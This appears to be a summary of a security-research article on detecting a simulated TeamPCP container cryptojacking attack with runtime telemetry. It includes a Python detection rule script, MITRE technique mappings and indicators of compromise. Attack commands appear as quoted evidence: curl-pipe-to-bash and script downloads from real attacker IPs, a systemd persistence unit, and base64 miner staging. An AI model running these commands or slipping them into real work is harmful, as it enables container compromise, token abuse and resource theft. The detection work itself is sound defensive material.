Linux & Cloud Detection Engineering – TeamPCP Container Attack Scenario — Elastic Security Labs

This article walks through a simulated container attack chain based on the TeamPCP cloud-native cryptojacking and ransomware operation, showing how Defend for Containers (D4C) telemetry surfaces each stage from initial execution through persistence, lateral movement, tunneling, and miner deployment. By mapping observable runtime behavior to detection logic and correlating D4C runtime events with Kubernetes audit logs, the analysis demonstrates how to detect complex, multi-stage compromises across containers and the control plane. #TeamPCP #Kubernetes

Key points

  • Attack begins with download-and-execute (curl | bash) to gain interactive execution inside a container, which D4C detects via process lineage and interactive flags.
  • Threat actor checks for Kubernetes service account tokens and enumerates environment and file paths to determine whether cluster-wide propagation is possible.
  • Lateral movement is achieved by downloading and running a kube.py script that uses a stolen service account token to enumerate and execute across pods and nodes.
  • Persistence attempts include writing systemd service units from within a container, an anomalous action indicating possible host-level impact or escape.
  • Attackers stage tooling at runtime (apk/apt installs), deploy tunneling/proxy tools (frps, gost, socat, SSH) for external connectivity, and reconstruct and run a base64-encoded miner (xmrig) for monetization.
  • Correlating D4C runtime telemetry with Kubernetes audit logs and using Attack Discovery produces a coherent kill chain that maps execution, discovery, persistence, privilege escalation, C2, and impact.
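The detection logic the key points describe, as an added example that is not Elastic's or D4C's own code: a small rule set run over constructed container process and file events, flagging the download-and-execute, service account token check, systemd unit write, and base64 miner staging stages and mapping each to the technique ID used in this summary. Field names loosely follow ECS; the events and the `container.id` values are constructed for illustration.

```python
import re

SA_TOKEN = "/var/run/secrets/kubernetes.io/serviceaccount/token"

# Constructed sample events (not real telemetry); field names loosely follow ECS.
SAMPLE_EVENTS = [
    {"container.id": "c1", "event.action": "exec", "process.name": "sh",
     "process.args": ["sh", "-c", "curl -fsSL http://example.invalid/files/proxy.sh | bash"]},
    {"container.id": "c1", "event.action": "exec", "process.name": "sh",
     "process.args": ["sh", "-c", "[ -f " + SA_TOKEN + " ]"]},
    {"container.id": "c1", "event.action": "write", "process.name": "bash",
     "file.path": "/etc/systemd/system/teampcp-react.service"},
    {"container.id": "c1", "event.action": "exec", "process.name": "sh",
     "process.args": ["sh", "-c", "base64 -d /tmp/miner.b64 > /tmp/miner && chmod +x /tmp/miner"]},
    {"container.id": "c2", "event.action": "exec", "process.name": "bash",
     "process.args": ["bash", "-c", "echo healthy > /tmp/health"]},  # benign control event
]


def _cmd(event):
    """Joined command line, or an empty string for non-exec events."""
    return " ".join(event.get("process.args", []))


# Each rule: (name, technique ID from this summary, predicate over one event).
RULES = [
    ("download_and_execute", "T1059.004",
     lambda e: re.search(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", _cmd(e)) is not None),
    ("service_account_token_access", "T1078",
     lambda e: SA_TOKEN in _cmd(e) or e.get("file.path") == SA_TOKEN),
    ("systemd_unit_write_in_container", "T1543.003",
     lambda e: e.get("event.action") == "write"
     and e.get("file.path", "").startswith("/etc/systemd/system/")),
    ("staged_payload_decode", "T1496",
     lambda e: re.search(r"base64\s+-d\b.*>\s*/tmp/\S+.*chmod\s+\+x", _cmd(e)) is not None),
]


def detect(events):
    """Return one alert per (event, rule) match, preserving event order so the
    alerts read as the kill chain stages in the order they occurred."""
    alerts = []
    for e in events:
        for name, technique, pred in RULES:
            if pred(e):
                alerts.append({"container.id": e["container.id"],
                               "rule": name, "technique": technique})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

In a real deployment the container ID would be the join key against Kubernetes audit log entries for the same pod, which is the correlation step the summary describes.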

MITRE Techniques

  • [T1059.004] Command and Scripting Interpreter – Used for interactive shell and interpreter execution (e.g., curl | bash and python -c payloads). Quote: 'curl -fsSL http://67.217.57[.]240:666/files/proxy.sh | bash'
  • [T1105] Ingress Tool Transfer – Downloading remote scripts and tools into the container for execution. Quote: 'curl -fsSL http://44.252.85[.]168:666/files/kube.py -o /tmp/k8s.py'
  • [T1543.003] Create or Modify System Process: systemd – Attempting to establish persistence by writing a systemd unit from inside a container. Quote: 'cat>/etc/systemd/system/teampcp-react.service<<SVCEOF … ExecStart=/usr/bin/python3 ${dir}/react.py … SVCEOF'
  • [T1078] Valid Accounts – Using an existing Kubernetes service account token to access the API and perform cluster enumeration and actions. Quote: 'if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]'
  • [T1090] Proxy – Deploying tunneling and proxy tooling to expose internal services and maintain remote access (frps, gost, socat, SSH tunneling). Quote: 'deploy tunneling and proxy tooling such as frps and gost to expose internal services'
  • [T1083] File and Directory Discovery – Checking for specific files and sensitive locations to determine environment and privilege (service account token, environment variables, sensitive file paths). Quote: 'the dropped scripts enumerate environment variables and several sensitive file locations'
  • [T1496] Resource Hijacking – Deploying and executing a cryptominer (xmrig) to monetize compromised resources. Quote: '/bin/sh -c "base64 -d /tmp/miner.b64 > /tmp/miner && chmod +x /tmp/miner && rm /tmp/miner.b64"'

Indicators of Compromise

  • [IP Address] Download/C2 servers – 67.217.57.240:666, 44.252.85.168:666
  • [Domain] Remote script/source and tooling – update.aegis.aliyun.com (used in the competitor-kill/uninstall step)
  • [File names/paths] Dropped and staged payloads or service files – /tmp/k8s.py, /tmp/miner (and miner.b64), /etc/systemd/system/teampcp-react.service
  • [Processes/tools] Tunneling and monetization tools observed – gost, frps, xmrig (examples of tools executed inside containers)
  • [Port] C2/proxy listener – SOCKS5 proxy reported on port 1081 (tunneling/proxy access)

Read more: https://www.elastic.co/security-labs/teampcp-container-attack-scenario